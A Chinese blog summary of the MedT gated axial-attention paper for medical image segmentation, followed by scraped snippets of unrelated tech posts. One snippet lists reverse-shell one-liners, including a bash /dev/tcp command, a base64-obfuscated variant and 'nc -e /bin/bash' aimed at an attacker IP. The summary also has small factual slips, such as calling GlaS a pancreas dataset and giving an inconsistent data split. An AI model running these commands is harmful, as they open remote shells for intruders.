黄小米吖

[Transformer]MedT:Medical Transformer: Gated Axial-Attention for Medical Image Segmentation

Medical Transformer:门控轴向注意力用于医学图像分割

Abstract
Section I Introduction
Section II Medical Transformer(MedT)
- Part 1 Self-Attention Overview
- Part 2 Gated Axial-Attention
Section III Exoeriments
Section IV Conclusion
Appendix
- Part 1 Dataset
- Part 2 MedT
- Part 3 Training Details
- Part 4 Ablation Study
- Part 5 Results
- Part 6 Concurrent works

Abstract

过去十年间，深度卷积神经网络广泛应用于医学图像分割领域并取得了优异的性能；但是鉴于卷积结构自身的局限性，无法有效的捕获长程依赖关系。
 近期提出的Transformer借助self-attention机制可以有效捕获长程依赖关系，获得更丰富的特征表述。因此也启发我们探究基于Transformer的网络结构用于医学图像分割。目前大多数研究需要Transformer在大规模数据集上进行预训练，但是医学图像与自然图像相比，数据集规模相对较小，因此使得Transformer应用于医学图像分割存在挑战。
 为此本文提出基于门控的轴向注意力模型，为SA模块引入了一个额外的控制机制。此外为了有效的训练医学图像，本文还提出了一种叫做LoGo的训练策略，通过整张图和patch分别学习全局和局部特征。本文提出的MedT模型在三种不同种类的医学图像分割数据集上进行了测试，均取得了优于卷积神经网络的分割结果。

Section I Introduction

开发自动、准确、鲁邦的医学图像分割方法一直是医学成像的主要任务之一，因为这对计算机辅助诊断等至关重要，从医学图像中分割器官、组织可以辅助医生进行临床诊断并制定治疗计划。目前主流方法是基于卷积神经网络进行搭建，如UNet,V-Net，3D-UNet，Res-UNet,Dense-UNet，Y-Net,UNet+++，KiU-Net，这些网络在诸多具有挑战性的任务上取得了优异的性能，验证了ConvNet在特征提取进行器官/组织分割的有效性。
  ConvNets是目前分割方法的主流，但是它们缺乏建模长程依赖的能力；具体地说是每一次卷积操作其感受野只是图像的局部像素，而不是全局信息；也有的研究通过图像金字塔、空洞卷积、注意力机制等进行长程建模。但是在如何建模长程依赖关系这方面仍然有继续改进的空间，因为前任的工作并不是完全聚焦于医学图像分割领域。 
  为了更好的理解为什么长程依赖关系对医学图像很重要，本文可视化了一个新生儿的超声扫描图像，详情参见Fig 1.为了进行有效的分割，网络需要识别哪些像素是背景，哪些属于mask哪些属于前景物理。鉴于图像的背景十分发散，因此需要学习背景像素之间的远程依赖关系，这样才能减少假阳性的判断（假阳就是将背景误认为前景）；而当前景mask比较大时，则需要学习mask像素之间的远程依赖关系，才能做出正确的预测。与GT（Fig 1(e)相比）Fig 1(b)©中都错误的将背景分割成了brain区域，而基于Transformer的MedT(d)没有发生误分类，这就突出了长程依赖关系的重要性。
  

在诸多NLP任务中，Transformer已经被证实可以有效编码长程依赖关系，主要是基于self-attention机制可以有效的计算输入序列之间的关联。近期Transformer也被用于CV领域，如Axial-DeepLab使用一个轴向注意力模块，将二维SA分解为两个1D的SA计算，并且引入对位置敏感的轴向注意机制进行分割。SETR则是使用Transformer作为编码器，ConvNets作为解码器，以此组建了一个强大的分割器。而在医学图像分割中Transformer还没有做太多的探索，近期的工作主要聚焦于如何基于注意力机制来提升性能，但是这些网络仍然以CNN作为编码和解码器的主要模块。 
  本文观察到，Transformer需要在大规模数据集上预训练才能得到较好的性能，但是医学图像其数据集规模并不如自然图像规模那么庞大，能用于预训练的医学图像资源十分有限；而医学图像打标签也十分费时费力，需要很强的专家只是。而没有充足的专家信息使得学习十分困难，无法有效的学习位置信息、对图像进行编码等。 
  因此本文提出一种轴向的且对位置敏感的注意力机制，引入4个门来控制图像信息和位置信息的流动；而这些门控参数都是可以学习的，使得MedT可以用于任何规模的数据集。 根据数据集的大小，这些门会决定学习特定信息需要多少训练数据；此外本文还提出了一种局部-全局的训练策略（LoGo），即分别使用一个较浅的全局分支和一个较深的局部分支分别提取图像信息，这种方法使得我们不仅可以关注局部细节信息也可以关注全局信息，本文将这种基于轴向注意力的对位置敏感的Transformer模型称之为MedT。 
  本文工作总结如下：

（1）提出一种基于门控机制的对位置敏感的轴向注意力计算方法，即使在小规模数据集上也有较好的性能； 
（2）引入LoGo这种有效的Transformer训练策略； 
（3）基于上述两点提出的MedT框架专门用于医学图像分割任务； 
（4）在三种不同数据集上的分割结果显示MedT性能显著优于传统的卷积网络或基于注意力机制的网络。

Section II Medical Transformer(MedT)

Part 1 Self-Attention Overview

对于CinxHxW的输入图像，self-attention的计算为： 

其中Wq,Wk,Wv是需要学习的参数。但是原始SA的计算会随着输入图像的尺寸不断增大，因此不适合用于计算机视觉任务中处理图像；此外与卷积不同，SA的计算无法利用任何位置信息，而位置信息在计算机视觉任务中对于感知对象结构也十分有用。

Axial-Attention 
为了降低注意力的计算复杂度，本文将SA的计算分解为两个SA模块，第一个模块沿feature map高度轴进行计算，第二个模块沿着feature map宽度轴进行计算。同时也通过position bias嵌入位置信息，通常进行的是相对位置嵌入，这些位置编码通常可以通过训练来学习，已经有研究证明可以编码图像的空间结构。
而本文参考Axial DeepLab的做法，对所有的q,k,v均进行位置编码。因此对于给定的输入，SA的计算公式为： 这只是描述了沿宽度轴的SA计算，沿高度轴的计算也类似。

Part 2 Gated Axial-Attention

本文探讨了使用轴向注意力的好处，可以有效的捕获非局部的上下文信息并且计算更高效，同时可以有效的嵌入位置信息，捕获特征映射之间的长程依赖关系。但是这些模型都是在大型分割数据集上训练的结果，可以同分的学习q,k,v的各种差异。本文则关注于小规模数据集上的应用，因为这是医学图像分割的常见应用场景。 在这种情景下，往往很难学习位置信息，从而也就无法精确的编码长程依赖关系。此时在相对位置信息不够精确的前提下，将位置信息嵌入到各自的q,k,v中会导致精度下降，因此本文提出一种改进的轴向注意力模块（modified axial-attention block）可以控制位置偏差的嵌入位置、施加的影响。 比如添加门控机制后，宽度轴上的SA计算公式变为：
  
Gq,Gk,Gv1,Gv2是门控参数，都是科学系的，通过这些门控参数控制相对位置信息对非局部上下文信息的影响；通常当相对位置信息比较准确时门控参数会赋予更高的权重。
 Part 3 Local-Global Training 
 显然，如果输入的是patch，transformer计算会很快，但仅训练patch不足以完成医学图像的分割任务，因为patch限制了学习patch之间的像素和语义关联。
 为了更好的理解整张图，本文在网络中使用了两个分支，一个全局分支和一个局部分支，全局分支处理的是整张图像，局部分支处理的是图像patch。 全局分支中减少了门控Transformer层的数量，因为通过实验观察到transformer仅依靠前面几层就足以建模长程依赖关系；本地分支则使用的是I/4大小的16个patch作为输入，经过transformer层处理的输出会重采样获得最终的输出；这两个分支的处理结果会进行add然后经过1x1卷积层获得最终的分割结果。
  这种训练策略有效的捕获了高级全局信息和浅层次细节信息。 因此MedT使用门控轴向注意力层作为基础模块，并采用LoGo策略进行训练，详情参见Fig 2(a)。

Fig 2(a)展示了MedT的整体架构，Fig 2(b)展示的是MedT中的轴向transformer层，Fig 2©则是门控轴向注意力层，是MedT中的基础组件.

Section III Exoeriments

Dataset 
 Brain anatomy Segmentation 
 Gland数据集 
 MoNuSeg数据集
损失函数：交叉熵损失函数 

对比网络： FCN,UNet,UNet++，Res-UNet 
本文还进行了消融实验测试各部分的作用

Results 
Table 1展示了不同数据集上不同网络的分割结果，评价指标有F1分数和IoU，对比网络包含CNNbased的FCN,UNet,UNet++，Res-UNet；注意力机制的Axial Attention UNet；以及本文的MedT 对于脑部分割，可以看到Attention网路性能比CNN网络性能好；但是对于胰腺和细胞分割因为数据集规模较小，attention机制就有一定局限性。而本文的门控机制可以减轻这一限制，结合LoGo训练策略取得了SOTA结果，在三类数据集上的性能都达到了SOTA。

Fig 3可视化了三类数据集上一些实际的分割结果，可以看到MedT确实有效的捕获了长程依赖关系，比如第二行的白点，所有卷积网络都没能分割出来；而由于注意力机制编码了长程依赖关系就能够分割出这一部分；而在第一行和第四行CNN和注意力机制均出现了误分割，而MedT的门控机制可以很好的根据像素之间的依赖关系决定注意力的权重，从而获得更精确的分割结果。

Section IV Conclusion

本文探究了基于Tansformer的医学图像分割模型，并提出了基于轴向注意力的MedT分割框架，它可以通过门控机制决定注意力的权重；此外本文还提出了一种LoGo训练策略可以按照不同分支充分学习全局和局部信息。
MedT的优势在于无需在大规模数据集上进行预训练，本文在三类分割数据集上进行了广泛的实验，均达到了SOTA。

Appendix

Part 1 Dataset

Brain US Dataset 颅内出血是导致早产儿脑损伤的主要病因，主要诊断方法需要进行露骨成像。
Brain US Dataset采集了20名早产儿的1629张颅内扫描图像，training:testing = 1629:329 图像大小reshape到128128 
GLAS Dataset 
Gland数据集包含165张胰腺HE染色图像，training:testing = 85:80.可以看到数据集规模较小依旧reshape到128128 
MoNuSeg Dataset 
包含40x放大的细胞HE染色图像，training:testing = 30:14 图像大小reshape到512*512

Part 2 MedT

MedT使用LoGo训练策略，包含两个分支：全局分支和局部分支。而这两个分支的输入是卷积模块输出的feature map，卷积块包含3层conv,每次卷积之后经过BN+ReLU。 两个分支的Encoder使用的就是transformer layer,Encoder使用两个transformer block分别沿高度轴和宽度轴计算SA，而每个MHSA模块则如Fig2©所示包含8个门控参数；MHSA的输出经过1x1卷积处理后送入Decoder；两个分支均包含5个encoder block和5个decoder block。

Part 3 Training Details

优化器 Adam LR = 0.001 训练400epochs 训练卡 Nvidia quadro8000

Part 4 Ablation Study

首先搭建UNet，随后添加残差连接组成Res-UNet。
   Axial UNet则是将所有卷积层替换为axial attention层；Gated Axial UNet是将轴向注意替换为带门控的轴向注意层。 训练时也对比了仅使用全局分支或局部分支的效果。
   

Table 1是消融实验的对比结果。
    Table 2展示的是不同网络的参数量及对应精度。其中mod都是轻量级版本，通过对比主要是为了说明即使有的基准网络具备更多网络参数，性能也没有超过MedT。

Part 5 Results

Fig 1可视化了一些分割结果，可以看到基于CNN的方法总是会有误分割现象，但是本文的MedT就不会产生误分割。 

Part 6 Concurrent works

TransUNet灵感源自ViT，在UNet结构中融合了Transformer，但是TransUNet依旧依赖于大规模数据集预训练的结果； Transfuse也是近期提出用于息肉分割的网络框架，使用了并行CNN分支与Transformer分支融合进行分割。
 而本文则是探究仅借助Transformer的注意力机制进行分割的可行性，同时无需任何预训练。

C#图像处理-OpenCVSharp教程(三十五) OpenCVSharp运动物体检测(一) Color Space OpenCVSharp C#OpenCV C#图像处理
本文作者ColorSpace，文章未经作者允许禁止转载！本文将介绍OpenCVSharp运动物体检测(一)代码演示：///图片背景差法检测运动物体MatbgImg=Cv2.ImRead("1.bmp");MatfgImg=Cv2.ImRead("55.bmp");Cv2.ImShow("bg",bgImg);Cv2.ImShow("fg",fgImg);Matgray=newMat();Matgr
AI人工智能中LSTM在视频行为识别的应用
AI人工智能中LSTM在视频行为识别的应用关键词：LSTM、视频行为识别、深度学习、时序建模、计算机视觉、神经网络、动作识别摘要：本文将深入探讨LSTM（长短期记忆网络）在视频行为识别领域的应用。我们将从基础概念出发，逐步讲解LSTM如何解决视频时序建模的挑战，分析其核心算法原理，并通过实际代码示例展示LSTM在行为识别中的具体实现。文章还将探讨当前的应用场景、工具资源以及未来发展趋势，为读者提供
【Transformer论文】通过蒙面多模态聚类预测学习视听语音表示 Wwwilling 推荐系统论文阅读 Transformer系列论文 transformer 聚类多模态
文献题目：LEARNINGAUDIO-VISUALSPEECHREPRESENTATIONBYMASKEDMULTIMODALCLUSTERPREDICTION发表时间：2022发表期刊：ICLR摘要语音的视频记录包含相关的音频和视觉信息，为从说话者的嘴唇运动和产生的声音中学习语音表示提供了强大的信号。我们介绍了视听隐藏单元BERT(AV-HuBERT)，这是一种用于视听语音的自我监督表示学习框架
运筹系列91：vrp算法包PyVRP IE06 运筹学人工智能
1.介绍PyVRP使用HGS（hybridgeneticsearch）算法求解VRP类问题。在benchmark上的评测结果如下，看起来还不错：2.使用例子2.1CVRPCOORDS=[(456,320),#location0-thedepot(228,0),#location1(912,0),#location2(0,80),#location3(114,80),#location4(570,1
高效比较两个list中不同的元素 tanghuan0827 java javaapi
第四种方法，将其中一个list转为map,并通过containsKey()方法比较，用在单元测试，读取dbf文件到redis队列，测试redis和dbf的是否相同packagecom.test;importjava.util.ArrayList;importjava.util.HashMap;importjava.util.List;publicclassTest{publicstaticvoid
告别GPU焦虑：如何在纯CPU服务器上，打造高性能Embedding服务？ ezl1fe embedding 后端人工智能
Hi，大家好，我是ezl1fe。最近接手一个项目，要求在纯CPU服务器上部署Embedding模型服务。兄弟们都懂，GPU它香啊，但它也贵啊！很多时候，咱只能在有限的资源里想办法。一开始，我们图方便，直接从HuggingFace上拉了当时效果最好的BAAI/bge-m3模型，用transformers库一把梭。结果呢？部署到一台8核16G的服务器上，精度是高，但性能也是真的“感人”，单个请求响应要
Java宠物类设计：从基础到空指针预防 Cyanto Java java 开发语言
宠物类（Pet）设计首先我们来看一个简单的宠物类设计，这个类包含了宠物的基本属性和行为：publicclassPet{//成员变量(属性)Stringname;//宠物名字Stringbirthday;//出生日期chargender;//性别//成员方法(行为)publicvoideating(){System.out.println("开吃！");}publicvoidrunning(){Sy
高性能AI核心板Z3588CV1：基于瑞芯微RK3588的旗舰级解决方案——8K视觉处理 · 6TOPS NPU算力 · 多场景边缘计算九鼎创展科技嵌入式硬件边缘计算 arm开发 android
RK3588处理器技术细节计算单元CPU：4×[email protected]（大核集群）4×[email protected]（能效集群）支持ARMDynamIQ混合架构，可实现任务智能调度GPU：Mali-G610MP4，支持OpenGLES3.2/2.0/1.1、Vulkan1.28KVPU视频编解码：H.265/H.264/AV1格式，支持60fps实时处理NPU：6TOPS算力（INT
opc server 开发心得 carelg server service input output tags mfc
这段时间公司项目上需要把数据通过OPCSERVER开放接口，在网上及CSDN上SEARCH了好久，感觉CSDN上的资料还是比较专业的，但也有做广告的,我摸索了一周时间，有点心得，并用在工程上，一下是一周体会;一：WINTECH的开发包WINTECH网站上可下载开发包，WTOPCSVR.DLL有VBVCVC#的例程，但是DEMODLL,可运行30分钟，比较容易上手，但对开发者来说不能从内核上了解OP
银河麒麟服务器迁移运维管理平台(接口文档) RZer 麒麟软件运维服务器 android Kylinsoft
银河麒麟高级服务器操作系统V10系统管理员手册文章目录CVE下发接口获取CVE接口获取主机接口获取批次接口获取父日志接口获取子日志接口CVE下发接口功能描述:CVE下发接口调用接口URL:/cve/issue接口类型:POST请求头:API-KEY:your_API_key（内容为APIKey值，需要通过登陆平台，在个人信息处获取）参数:参数名类型含义targetType字符串传入类型（二选一）：
面经总结系列（十六）：元象科技大模型推理优化工程师 GoAI AI面经总结机器学习算法人工智能大模型机器学习深度学习
‍作者简介：CSDN、阿里云人工智能领域博客专家，新星计划计算机视觉导师，百度飞桨PPDE，专注大数据与AI知识分享。✨公众号：GoAI的学习小屋，免费分享书籍、简历、导图等，更有交流群分享宝藏资料，关注公众号回复“加群”或➡️点击链接加群。AI学习星球推荐：GoAI的学习社区知识星球是一个致力于提供《机器学习|深度学习|CV|NLP|大模型|多模态|AIGC》各个最新AI方向综述、论文等成体系的
《深入浅出多模态》(四)：多模态经典模型CLIP GoAI 深入浅出多模态多模态大模型 LLM 人工智能
AI学习星球推荐：GoAI的学习社区知识星球是一个致力于提供《机器学习|深度学习|CV|NLP|大模型|多模态|AIGC》各个最新AI方向综述、论文等成体系的学习资料，配有全面而有深度的专栏内容，包括不限于前沿论文解读、资料共享、行业最新动态以、实践教程、求职相关（简历撰写技巧、面经资料与心得）多方面综合学习平台，强烈推荐AI小白及AI爱好者学习，性价比非常高！加入星球➡️点击链接✨专栏介
深入浅出多模态》（十一）之多模态经典模型：Flamingo系列 GoAI 机器学习多模态大模型人工智能 LLM 机器学习
AI学习星球推荐：GoAI的学习社区知识星球是一个致力于提供《机器学习|深度学习|CV|NLP|大模型|多模态|AIGC》各个最新AI方向综述、论文等成体系的学习资料，配有全面而有深度的专栏内容，包括不限于前沿论文解读、资料共享、行业最新动态以、实践教程、求职相关（简历撰写技巧、面经资料与心得）多方面综合学习平台，强烈推荐AI小白及AI爱好者学习，性价比非常高！加入星球➡️点击链接✨专栏介绍：本作
当前最好的0样本文本转语音是哪个模型？ skywalk8163 多媒体人工智能人工智能 MegaTTS3
综合排名前三模型‌MegaTTS3（字节跳动&浙江大学）‌‌核心优势‌：仅需‌3-10秒‌参考音频即可精准克隆音色，支持中英混合语音自然切换1112轻量化设计（0.45B参数），实时生成延迟低于400ms11采用‌DiffusionTransformer+WaveVAE‌架构，在韵律自然度榜单SpeechArena排名第一11‌开源地址‌：GitHub官方仓库（免费商用）‌MiniMaxSpeec
paddlepaddle测试安装_python3.7中安装paddleocr及paddlepaddle包的多种方法瓦啦
升级pippip版本必须升级到20.0.4版本才能应用；方法一、在pycharm中对pip进行升级；方法二、通过命令进行升级python3.7-mpipinstall--upgradepip下载paddleOCR下载链接：https://github.com/PaddlePaddle/PaddleOCR打开paddleOCR文件夹中requirements.txt文件，更改文件中opencv-py
【EI会议征稿】2025年第四届计算机视觉与模式分析国际学术大会（ICCPA 2025）
重要信息2025年5月16-18日|中国·鞍山大会官网：www.iccpa.org会议主页：2025年第五届计算机视觉与模式分析国际学术大会（ICCPA2025）_艾思科蓝_学术一站式服务平台接收/拒稿通知：投稿后1周内收录检索：EICompendex，Scopus主办单位辽宁科技大学往届历史ICCPA前四届均已成功举办，并完成EI、Scopus检索（高录用，稳定检索）
各种shell反弹方法 !QK linux 网络安全安全 web安全 bash
1.利用bash进行反弹shell先使用nc进行监听nc-lvvpport端口号再在目标机器执行bash-i>&/dev/tcp/攻击ip/端口0>&1bash-c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjcvMjIzMyAwPiYx}|{base64,-d}|{bash,-i}2.使用nc进行反弹shellnc-e/bin/bash攻击IP端
YOLOv11革命性升级：基于MobileNetv4的UIB和ExtraDW模块重构C3k2架构，实现移动端推理性能飞跃博导ai君深度学习教学-附源码 YOLO 重构
引言与背景概述在当今人工智能飞速发展的时代，目标检测技术已成为计算机视觉领域的核心技术之一。从自动驾驶汽车到智能安防系统，从移动端AR应用到工业质检，目标检测无处不在。然而，随着应用场景的多样化，特别是移动端和边缘设备的普及，对模型的计算效率提出了更为严苛的要求。YOLO（YouOnlyLookOnce）系列算法作为目标检测领域的领军者，一直在精度与速度之间寻求最佳平衡。从YOLOv1到最新的YO
Java用CompareTo方法实现根据两个或多个属性对对象进行排序偶遇急雨洗心尘 java jvm 开发语言 servlet 算法
CompareTo方法CompareTo是String类的方法，CompareTo(Objecto1,Objecto2)，就是用o1和o2进行比较o1.compateTo(o2)大于0则o1大o1.compateTo(o2)小于0则o2大o1.compateTo(o2)等于0则一样大升序降序升序：publicstaticvoidmain(String[]args){ArrayListlist=ne
Java中for循环中用break是跳出内层循环还是外层循环偶遇急雨洗心尘 java 算法 jvm 数据结构开发语言
背景：我们知道：for循环中常用“continue”跳过当前循环执行下个循环，常用“break”跳出循环，但是在for循环嵌套中break是仅跳出内层循环还是跳出所有循环呢？测试：publicstaticvoidmain(String[]args){for(inti=0;i<5;i++){for(intj=0;j<5;j++){if(j==3){break;}System.out.println(
使用Ultralytics YOLO进行数据增强 alpszero YOLO计算机视觉应用 YOLO 人工智能机器学习
概述数据增强是计算机视觉领域的一项重要技术，它通过对现有图像进行各种转换，人为地扩展训练数据集。在训练深度学习模型时，数据增强有助于提高模型的鲁棒性，减少过拟合，并增强对真实世界场景的泛化。在训练计算机视觉模型的过程中，数据增强具有多种重要作用：扩展数据集：通过创建现有图像的变体，可以有效增加训练数据集的规模，而无需收集新数据。提高泛化能力：模型学会在各种条件下识别物体，使其在实际应用中更加稳健。
PART 7 视频 qq_39717490 音视频 opencv 人工智能
在Debian10上安装OpenCV的两种方法：从存储库和源代码中安装OpenCV_debianopencv-CSDN博客本人的树莓派系统是pi@pi:~$lsb_release-aNoLSBmodulesareavailable.DistributorID:DebianDescription:DebianGNU/Linux12(bookworm)Release:12Codename:bookwo
鸿蒙应用AR开发：增强现实技术实现方案操作系统内核探秘操作系统内核揭秘 OS harmonyos ar 华为 ai
鸿蒙应用AR开发：增强现实技术实现方案关键词：鸿蒙系统、AR开发、增强现实、ARKit、ARCore、3D渲染、计算机视觉摘要：本文将深入探讨如何在鸿蒙操作系统上开发增强现实(AR)应用。我们将从AR技术的基本原理讲起，逐步深入到鸿蒙AR开发框架的具体实现，包括3D模型渲染、空间定位、手势识别等核心技术。文章将提供完整的代码示例和实战项目，帮助开发者快速掌握鸿蒙AR应用开发的核心技能。背景介绍目的
YOLOv11: AN OVERVIEW OF THE KEY ARCHITECTURAL ENHANCEMENTS目标检测论文精读（逐段解析）昵称是6硬币 (持续更新)YOLO 深度学习计算机视觉人工智能目标检测图像处理
YOLOv11:ANOVERVIEWOFTHEKEYARCHITECTURALENHANCEMENTS目标检测论文精读（逐段解析）论文地址：https://www.arxiv.org/abs/2410.17725RahimaKhanamandMuhammadHussainUltralytics公司发布CVPR2024论文写的比较简单，比较核心的改进包括：C3K2高效特征提取机制。对C2f模块的改进
Ultralytics YOLO 库介绍与使用指南东北豆子哥人工智能/机器学习 YOLO
文章目录UltralyticsYOLO库介绍与使用指南主要特点安装基本使用1.使用预训练模型进行推理2.训练自定义模型3.验证模型4.导出模型高级功能1.使用不同任务模型2.使用自定义数据集3.跟踪对象(结合ByteTrack)常见问题解决性能优化技巧UltralyticsYOLO库介绍与使用指南UltralyticsYOLO是一个流行的计算机视觉库，专注于实现和优化YOLO(YouOnlyLoo
KITTI数据集可视化实用教程及源码解析国营窝窝乡蛮大人
本文还有配套的精品资源，点击获取简介：本文详细介绍如何使用源码实现KITTI数据集的可视化，强调数据集可视化在计算机视觉领域的关键作用。重点介绍如何加载、处理和融合KITTI数据集中的图像和激光雷达数据，并通过可视化手段分析结果，包括图像点云投影、坐标转换、颜色映射等技术。读者将通过学习源码深入理解数据结构、文件格式，并定制化工具以满足特定项目需求。1.计算机视觉数据集可视化的重要性在计算机视觉领
DiNA：扩张邻域注意力 Transformer AI专题精讲 Paper阅读 transformer 人工智能
摘要Transformer正迅速成为跨模态、跨领域和跨任务中应用最广泛的深度学习架构之一。在计算机视觉领域，除了持续发展的纯transformer架构，分层transformer也因其优越的性能和在现有框架中易于集成而受到广泛关注。这类模型通常采用局部化的注意力机制，如滑动窗口的NeighborhoodAttention（NA）或SwinTransformer的ShiftedWindowSelfA
R语言与C语言混合编程：在R语言中调用C语言函数数据探索 r语言 c语言开发语言 R语言
R语言与C语言混合编程：在R语言中调用C语言函数介绍：R语言是一种用于统计分析和数据可视化的高级编程语言，而C语言是一种通用的、强大的编程语言。在某些情况下，我们可能需要在R语言中调用C语言函数以提高性能或实现特定的功能。本文将介绍如何在R语言中调用C语言函数的方法，并提供相应的源代码示例。步骤：为了在R语言中调用C语言函数，我们需要执行以下步骤：编写C语言函数：首先，我们需要编写我们想要在R中调
java复习 06 im_AMBER java 开发语言学习
线程还没学会，然后查漏补缺。再学一下泛型，下一篇博客写。1线程控制方法名说明staticvoidsleep(longmillis)使当前正在执行的线程停留（暂停执行）指定的毫秒数voidjoin()等待这个线程死亡voidsetDaemon(booleanon)将此线程标记为守护线程，当运行的线程都是守护线程时，Java虚拟机将退出sleep方法的应用，这里用trycatch包围packagePT
倾向得分匹配的stata命令_R语言系列1：倾向得分匹配 weixin_39995108 倾向得分匹配的stata命令
1PSM简介倾向评分匹配(PropensityScoreMatching，简称PSM)是一种统计学方法，用于处理观察研究(ObservationalStudy)的数据。在观察研究中，由于种种原因，数据偏差(bias)和混杂变量(confoundingvariable)较多，倾向评分匹配的方法正是为了减少这些偏差和混杂变量的影响，以便对实验组和对照组进行更合理的比较。这种方法最早由PaulRosen
Maven Array_06 eclipse jdk maven
Maven Maven是基于项目对象模型(POM)，信息来管理项目的构建，报告和文档的软件项目管理工具。 Maven 除了以程序构建能力为特色之外，还提供高级项目管理工具。由于 Maven 的缺省构建规则有较高的可重用性，所以常常用两三行 Maven 构建脚本就可以构建简单的项目。由于 Maven 的面向项目的方法，许多 Apache Jakarta 项目发文时使用 Maven，而且公司
ibatis的queyrForList和queryForMap区别 bijian1013 java ibatis
一.说明 iBatis的返回值参数类型也有种：resultMap与resultClass，这两种类型的选择可以用两句话说明之： 1.当结果集列名和类的属性名完全相对应的时候，则可直接用resultClass直接指定查询结果类
LeetCode[位运算] - #191 计算汉明权重 Cwind java 位运算 LeetCode Algorithm 题解
原题链接：#191 Number of 1 Bits 要求：写一个函数，以一个无符号整数为参数，返回其汉明权重。例如，‘11’的二进制表示为'00000000000000000000000000001011', 故函数应当返回3。汉明权重：指一个字符串中非零字符的个数；对于二进制串，即其中‘1’的个数。难度：简单分析：将十进制参数转换为二进制，然后计算其中1的个数即可。 “
浅谈java类与对象 15700786134 java
java是一门面向对象的编程语言，类与对象是其最基本的概念。所谓对象，就是一个个具体的物体，一个人，一台电脑，都是对象。而类，就是对象的一种抽象，是多个对象具有的共性的一种集合，其中包含了属性与方法，就是属于该类的对象所具有的共性。当一个类创建了对象，这个对象就拥有了该类全部的属性，方法。相比于结构化的编程思路，面向对象更适用于人的思维
linux下双网卡同一个IP 被触发 linux
转自： http://q2482696735.blog.163.com/blog/static/250606077201569029441/ 由于需要一台机器有两个网卡，开始时设置在同一个网段的IP，发现数据总是从一个网卡发出，而另一个网卡上没有数据流动。网上找了下，发现相同的问题不少：一、关于双网卡设置同一网段IP然后连接交换机的时候出现的奇怪现象。当时没有怎么思考、以为是生成树
安卓按主页键隐藏程序之后无法再次打开肆无忌惮_ 安卓
遇到一个奇怪的问题，当SplashActivity跳转到MainActivity之后，按主页键，再去打开程序，程序没法再打开（闪一下），结束任务再开也是这样，只能卸载了再重装。而且每次在Log里都打印了这句话"进入主程序"。后来发现是必须跳转之后再finish掉SplashActivity 本来代码： // 销毁这个Activity fin
通过cookie保存并读取用户登录信息实例知了ing JavaScript html
通过cookie的getCookies()方法可获取所有cookie对象的集合；通过getName()方法可以获取指定的名称的cookie；通过getValue()方法获取到cookie对象的值。另外，将一个cookie对象发送到客户端，使用response对象的addCookie()方法。下面通过cookie保存并读取用户登录信息的例子加深一下理解。（1）创建index.jsp文件。在改
JAVA 对象池矮蛋蛋 java ObjectPool
原文地址： http://www.blogjava.net/baoyaer/articles/218460.html Jakarta对象池 ☆为什么使用对象池恰当地使用对象池化技术，可以有效地减少对象生成和初始化时的消耗，提高系统的运行效率。Jakarta Commons Pool组件提供了一整套用于实现对象池化
ArrayList根据条件+for循环批量删除的方法 alleni123 java
场景如下： ArrayList<Obj> list Obj-> createTime, sid. 现在要根据obj的createTime来进行定期清理。（释放内存） ------------------------- 首先想到的方法就是 for(Obj o:list){ if(o.createTime-currentT>xxx){
阿里巴巴“耕地宝”大战各种宝百合不是茶平台战略
“耕地保”平台是阿里巴巴和安徽农民共同推出的一个 “首个互联网定制私人农场”，“耕地宝”由阿里巴巴投入一亿，主要是用来进行农业方面，将农民手中的散地集中起来不仅加大农民集体在土地上面的话语权，还增加了土地的流通与利用率，提高了土地的产量，有利于大规模的产业化的高科技农业的发展，阿里在农业上的探索将会引起新一轮的产业调整，但是集体化之后农民的个体的话语权将更少，国家应出台相应的法律法规保护
Spring注入有继承关系的类（1） bijian1013 java spring
一个类一个类的注入 1.AClass类 package com.bijian.spring.test2; public class AClass { String a; String b; public String getA() { return a; } public void setA(Strin
30岁转型期你能否成为成功人士 bijian1013 成功
很多人由于年轻时走了弯路，到了30岁一事无成，这样的例子大有人在。但同样也有一些人，整个职业生涯都发展得很优秀，到了30岁已经成为职场的精英阶层。由于做猎头的原因，我们接触很多30岁左右的经理人，发现他们在职业发展道路上往往有很多致命的问题。在30岁之前，他们的职业生涯表现很优秀，但从30岁到40岁这一段，很多人
[Velocity三]基于Servlet+Velocity的web应用 bit1129 velocity
什么是VelocityViewServlet 使用org.apache.velocity.tools.view.VelocityViewServlet可以将Velocity集成到基于Servlet的web应用中，以Servlet+Velocity的方式实现web应用 Servlet + Velocity的一般步骤 1.自定义Servlet，实现VelocityViewServl
【Kafka十二】关于Kafka是一个Commit Log Service bit1129 service
Kafka is a distributed, partitioned, replicated commit log service.这里的commit log如何理解？ A message is considered "committed" when all in sync replicas for that partition have applied i
NGINX + LUA实现复杂的控制 ronin47 lua nginx 控制
安装lua_nginx_module 模块 lua_nginx_module 可以一步步的安装，也可以直接用淘宝的OpenResty Centos和debian的安装就简单了。。这里说下freebsd的安装： fetch http://www.lua.org/ftp/lua-5.1.4.tar.gz tar zxvf lua-5.1.4.tar.gz cd lua-5.1.4 ma
java-14.输入一个已经按升序排序过的数组和一个数字，在数组中查找两个数，使得它们的和正好是输入的那个数字 bylijinnan java
public class TwoElementEqualSum { /** * 第 14 题：题目：输入一个已经按升序排序过的数组和一个数字，在数组中查找两个数，使得它们的和正好是输入的那个数字。要求时间复杂度是 O(n) 。如果有多对数字的和等于输入的数字，输出任意一对即可。例如输入数组 1 、 2 、 4 、 7 、 11 、 15 和数字 15 。由于
Netty源码学习-HttpChunkAggregator-HttpRequestEncoder-HttpResponseDecoder bylijinnan java netty
今天看Netty如何实现一个Http Server org.jboss.netty.example.http.file.HttpStaticFileServerPipelineFactory： pipeline.addLast("decoder", new HttpRequestDecoder()); pipeline.addLast(&quo
java敏感词过虑-基于多叉树原理 cngolon 违禁词过虑替换违禁词敏感词过虑多叉树
基于多叉树的敏感词、关键词过滤的工具包，用于java中的敏感词过滤 1、工具包自带敏感词词库，第一次调用时读入词库，故第一次调用时间可能较长，在类加载后普通pc机上html过滤5000字在80毫秒左右，纯文本35毫秒左右。 2、如需自定义词库，将jar包考入WEB-INF工程的lib目录，在WEB-INF/classes目录下建一个 utf-8的words.dict文本文件，
多线程知识 cuishikuan 多线程
T1，T2，T3三个线程工作顺序，按照T1，T2，T3依次进行 public class T1 implements Runnable{ @Override
spring整合activemq dalan_123 java spring jms
整合spring和activemq需要搞清楚如下的东东1、ConnectionFactory分： a、spring管理连接到activemq服务器的管理ConnectionFactory也即是所谓产生到jms服务器的链接 b、真正产生到JMS服务器链接的ConnectionFactory还得
